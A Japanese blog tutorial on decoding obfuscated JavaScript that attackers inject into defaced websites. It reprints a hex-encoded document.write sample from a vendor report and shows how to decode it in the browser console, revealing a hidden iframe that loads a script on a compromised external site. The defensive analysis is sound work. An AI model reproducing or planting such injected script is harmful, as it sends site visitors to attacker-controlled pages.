Javascriptの難読化されたコードを解読しよう!

自分のWEBサイトにアクセスすると、見知らぬサイトに転送されている!
ファイルの中身やデータベースを転送先のURLで検索しても見つからない。

そんな時は、攻撃者がバレにくくするために難読化してることが考えられる。

まずは curl でアクセスし、怪しいソースが埋め込まれていないかを確認することをお勧めする。

今回は、株式会社セキュアブレインさんの資料、ウェブ改ざんはこうして起こる その攻撃手法の解説 に記載されている難読化されているコードをお借りして、解読してみよう。

難読化のコード

1
2
3
4
5
6
7
8
9
function v4a8a200c53307(v4a8a200c536fb){ return(parseInt(v4a8a200c536fb,16)); }
function v4a8a200c542e3(v4a8a200c546d9){
var v4a8a200c552d1=2; var v4a8a200c54ad1='';
for(v4a8a200c54eda=0; v4a8a200c54eda<v4a8a200c546d9.length; v4a8a200c54eda+=v4a8a200c552d1){
v4a8a200c54ad1+=(String.fromCharCode(v4a8a200c53307(v4a8a200c546d9.substr(v4a8a200c54eda, v4a8a200c552d1)))); }
return v4a8a200c54ad1
document.write(v4a8a200c542e3('3C696672616D65206E616D653D273861386527207372633D27687474703A2F2F7777772E676F6F647374756666
726576696577732E636F6D2F77702D696E636C756465732F706F6D6F2F6B6F6F2F676F2E7068703F7369643D31272077696474683D313633206865
696768743D3635207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
  1. GoogleChrome を開き、 [ Option + Cmd + j ] で Javascriptコンソールを開く。
  2. 難読化コード内の “document.write” を “console.log” に置換し、Javascriptコンソールで実行する。

すると以下のようなコードが出てきた。

<iframe name='8a8e' src='http://www.goodstuffreviews.com/wp-includes/pomo/koo/go.php?sid=1' width=163 height=65 style='display:none'></iframe>

参考までに解読する動画を掲載。

[code.gif]

これで全てが解読出来るわけではないが是非、お試しあれ。